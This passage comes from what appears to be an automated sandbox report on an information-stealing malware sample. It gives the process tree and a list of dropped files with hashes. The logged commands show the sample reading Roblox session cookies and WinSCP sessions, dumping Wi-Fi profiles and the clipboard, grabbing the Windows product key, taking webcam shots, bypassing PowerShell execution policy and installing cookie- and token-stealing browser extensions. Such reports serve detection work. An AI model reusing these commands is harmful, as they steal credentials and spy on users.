                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:8144
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:4208
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:7304
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:3760
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:6960
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:2548
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:6148
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:2788
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:7164
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:5556
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:5716
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\c0uO9mGYC8kb_temp.ps1""
                                                                                                                                                              3⤵
                                                                                                                                                                PID:520
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\c0uO9mGYC8kb_temp.ps1"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:7824
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:6224
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5076
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:7804
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:6832
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\vZpg95hxoNQbTuTQ0UuM\System\cam.1208_Admin.jpg"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5252
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell.exe -NoProfile -Command "& {netsh wlan show profile}"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5372
                                                                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                                                                "C:\Windows\system32\netsh.exe" wlan show profile
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:7080
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:7860
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:6836
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5956
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\vZpg95hxoNQbTuTQ0UuM\System\cam.1208_Admin"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3192
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:6072
                                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                            tasklist
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                            PID:7856
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutRWIMw.ps1" -RunAsAdministrator"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5776
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutRWIMw.ps1" -RunAsAdministrator
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:7208
                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                          PID:3144
                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe26ca46f8,0x7ffe26ca4708,0x7ffe26ca4718
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:1604
                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2436,6964053829879877844,10736868196091253917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 /prefetch:3
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:648
                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2436,6964053829879877844,10736868196091253917,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2452 /prefetch:2
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2712
                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2436,6964053829879877844,10736868196091253917,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3164 /prefetch:8
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5068
                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2436,6964053829879877844,10736868196091253917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3504
                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2436,6964053829879877844,10736868196091253917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4472
                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2436,6964053829879877844,10736868196091253917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4060
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2436,6964053829879877844,10736868196091253917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1828
                                                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:4328
                                                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                            tasklist
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                            PID:6240
                                                                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:2452
                                                                                                                                                                                                          • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                            "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                            PID:2544
                                                                                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:3120
                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                              wmic process where processid=1208 get ExecutablePath
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:3432
                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                wmic PATH Win32_VideoController get name
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Detects videocard installed
                                                                                                                                                                                                                PID:3364
                                                                                                                                                                                                              • C:\Windows\system32\more.com
                                                                                                                                                                                                                more +1
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:1300
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  PID:1588
                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  PID:1500
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6056
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:852
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6160
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6196
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6372
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6360
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6320
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6304
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6280
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6272
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6264
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6232
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6208
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:3832
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:1836
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6112
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6096
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6076
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6032
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:6024
                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4632
                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4500
                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                      PID:3432
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:5308

                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                      • C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        43KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        252b4fda07550496d330d819f15ceb3e

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        650584312b310219a26d5fc20cb1804bb6c4dde5

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        39eafade0656a3c0bd723ad576b1f00a0d625ebeef80ac01f965165ffc28cf1d

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        a18529cc7325d3fce5fb5d32a63b74a8e2ff23a027c12fecdc111f14b1c601079512fce3ff5484a686aaa0dd1ea20083570707511541e4a6d7615053f3ffac49

                                                                                                                                                                                                                      • C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        33KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        c555604e8b6f818991e186342f856b1b

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        3ae02db8eba2f4fa30cb7567a9f5bf8346faded0

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe

                                                                                                                                                                                                                      • C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        f0f11cd478cc44d518c16820ede9d253

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        cfaf8d2e071f2ade0894578e5b44e02032d27be4

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

                                                                                                                                                                                                                      • C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo48.png

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        5KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        2f0a6a34d9b95bba0e3358ddd41ff2ac

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        f39a9e7aeab9fe86fd9034284516de40186e6e93

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084

                                                                                                                                                                                                                      • C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        978B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        04c23766134b234e85cc537b2162efb1

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        45c48d9ca30a4580a682f025cc66331e49f6f158

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

                                                                                                                                                                                                                      • C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        87KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        9ac39dc31635a363e377eda0f6fbe03f

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        29fa5ad995e9ec866ece1d3d0b698fc556580eee

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        9a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        0799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc

                                                                                                                                                                                                                      • C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        790B

                                                                                                                                                                                                                        MD5

